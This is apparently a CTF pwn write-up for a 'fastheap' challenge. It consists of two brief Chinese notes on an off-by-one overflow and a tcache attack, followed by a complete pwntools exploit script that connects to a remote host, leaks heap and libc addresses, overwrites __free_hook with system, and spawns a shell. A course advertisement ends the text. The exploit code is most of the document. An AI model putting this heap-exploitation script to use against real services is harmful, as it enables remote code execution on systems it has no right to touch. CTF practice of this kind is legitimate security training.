1 free的时候存在低8位溢出.通过这个漏洞在fastbin里面加入重复chunk
2 tcache攻击，写freehook

from pwn import *
#cn=process("./fastheap",shell=False)
cn=remote("152.136.18.34",10000)
base=0x555555554000
context.log_level='debug'
def create(id,size,data):
    cn.sendlineafter(">>> ","1")
    cn.sendlineafter("ndex: ",str(id))
    cn.sendlineafter("Size:",str(size))
    cn.sendlineafter("ontents:",data)

def show(id):
    cn.sendlineafter(">>> ", "3")
    cn.sendlineafter("ndex: ", str(id))

def delete(id1,id2,num):
    cn.sendlineafter(">>> ", "2")
    cn.sendlineafter("ndex range:",str(id1)+"-"+str(id2))
    cn.sendlineafter("Number of workers:",str(num))



for i in range(255):
    if i == 3:
        create(i, 0x60, p64(0x71)*12)

    else:
        create(i,0x60,"s"*0x60)


delete(251,255,7)

create(255,0x60,"a"*0x60)
create(254,0x60,"a"*0x60)
create(253,0x60,"a"*0x60)
create(252,0x60,"a"*0x60)
create(251,0x60,"a"*0x60)
delete(8,9,1)
delete(0,1,1)
show(255)
heap_base=u64(cn.recv(6)+"\x00\x00")-0x5d0
heap_jump=heap_base+0x410
success(hex(heap_base))

delete(30,50,1)
delete(6,7,1)
delete(20,21,1)
delete(253,254,1)
for i in range(3):
    create(i+30,0x60,"s"*0x60)

create(33,0x60,p64(heap_jump)*12)
create(34,0x60,"s"*0x60)
create(35,0x60,"s"*0x60)
create(36,0x60,p64(0)+p64(0xe1)+"\n")
delete(4,5,1)
show(251)
leak_addr=u64(cn.recv(6)+"\x00\x00")
libc_baes=leak_addr-0x3ebca0
one_addr=libc_baes+0x4f2c5
jmp2_addr=leak_addr-0x8b-0x8
free_hook=libc_baes+0x3ed8e8
sys_addr=libc_baes+0x04f440

delete(5,6,1)
delete(90,91,1)
delete(252,253,1)

create(37,0x60,p64(free_hook)*12)
create(38,0x60,"s"*0x60)
create(39,0x60,"s"*0x60)
create(40,0x60,p64(sys_addr)+"\n")


success(hex(free_hook))
#gdb.attach(cn,"set follow-fork-mode child\nb *"+hex(0x1109+base)+"\n b* "+hex(base+0xFC0)+"\n b *"+hex(base+0xEE0))
create(46,0x20,"/bin/sh\n")
delete(46,47,1)

cn.interactive()

[CTF入门培训]顶尖高校博士及硕士团队亲授《30小时教你玩转CTF》，视频+靶场+题目！助力进入CTF世界